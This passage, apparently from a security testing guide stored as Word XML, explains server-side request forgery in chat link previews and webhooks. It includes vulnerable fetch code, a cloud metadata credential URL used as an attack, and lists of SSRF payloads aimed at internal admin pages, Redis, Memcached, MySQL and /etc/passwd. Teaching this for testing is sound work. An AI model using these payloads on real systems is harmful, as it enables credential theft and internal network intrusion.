      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>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generateLinkPreview</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(url)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mmentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// User controls the URL through chat message input</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axios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">maxRedirects</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">3</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preview </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">extractPreviewData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">data</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preview</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This implementation appears secure with reasonable timeout and redirect limits. Your application validates that user input represents a valid URL format and implements basic protection against obvious malicious requests. The functionality works correctly for legitimate web URLs that users typically share.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">But SSRF attacks exploit the trust relationship between your chat server and internal network resources. When your application makes requests based on user input, attackers can target internal services, cloud metadata endpoints, or network resources that should remain inaccessible from external networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An attacker shares this URL in a chat message:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://169.254.169.254/latest/meta-data/iam/security-credentials/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your link preview system faithfully fetches this URL, but instead of accessing external web content, the request targets AWS instance metadata service. The response contains temporary security credentials for your cloud infrastructure, which the attacker can extract from the preview data or error messages returned by your application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Similar attacks target internal administrative interfaces, database management systems, or service discovery endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ssrfPayloads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://localhost:3000/admin/users"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Internal admin interface</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://127.0.0.1:6379/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Redis database</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"file:///etc/passwd"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Local file access</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"gopher://localhost:11211/stats"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Memcached access</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"dict://localhost:3306/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// MySQL protocol</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://[::1]:8080/health"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// IPv6 localhost</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your webhook integration system presents another SSRF vector. Chat applications often allow administrators to configure webhook URLs for integration with external services. These webhooks receive notifications about chat events, user activities, or administrative actions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Webhook configuration through admin interface</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configureWebhook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(webhookConfig) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> testPayload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'test'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">timestamp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">() }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Administrator controls webhook URL</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// SSRF occurs during webhook testing or notification delivery</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> axios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(webhookConfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> testPayload)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">saveWebhookConfiguration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(webhookConfig)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When administrators can configure arbitrary webhook URLs, SSRF enables access to internal network resources through your chat server’s network position. Administrative webhook configuration becomes a vector for internal network reconnaissance and exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Systematic SSRF Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traditional testing validates URL handling using normal web URLs that point to legitimate external resources. Developers verify that link previews work correctly, webhook integrations function as expected, and external content fetching provides appropriate user experience. Testing rarely explores URLs designed to target internal network resources or exploit trust relationships.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// SSRF payload generation targeting chat application URL processing</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">generateSSRFPayloads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(fuzzer) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> internalTargets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// AWS metadata service</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://169.254.169.254/latest/meta-data/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Google Cloud metadata</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://metadata.google.internal/computeMetadata/v1/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Azure metadata</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://169.254.169.254/metadata/instance"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Local services</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://localhost:3000/admin"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://127.0.0.1:6379/info"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// IPv6 variants</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://[::1]:8080/health"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Protocol confusion</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"file:///etc/passwd"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"gopher://localhost:11211/stats"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"dict://localhost:3306/"</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fuzzer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mutateURLStructures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(internalTargets)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your chat application’s external content fetching provides multiple attack vectors for SSRF testing. Link preview systems process user-provided URLs from chat messages. Webhook integrations make requests to administrator-configured endpoints. Avatar image fetching accesses user-provided image URLs. External API integrations might construct requests based on user input or configuration data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The generation strategy focuses on URLs that target internal network resources while remaining focused on your chat application’s specific external request patterns. Test various internal addressing schemes: localhost variations, private network ranges, cloud metadata endpoints, and protocol confusion attacks. Generate payloads targeting different request libraries and URL parsing implementations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
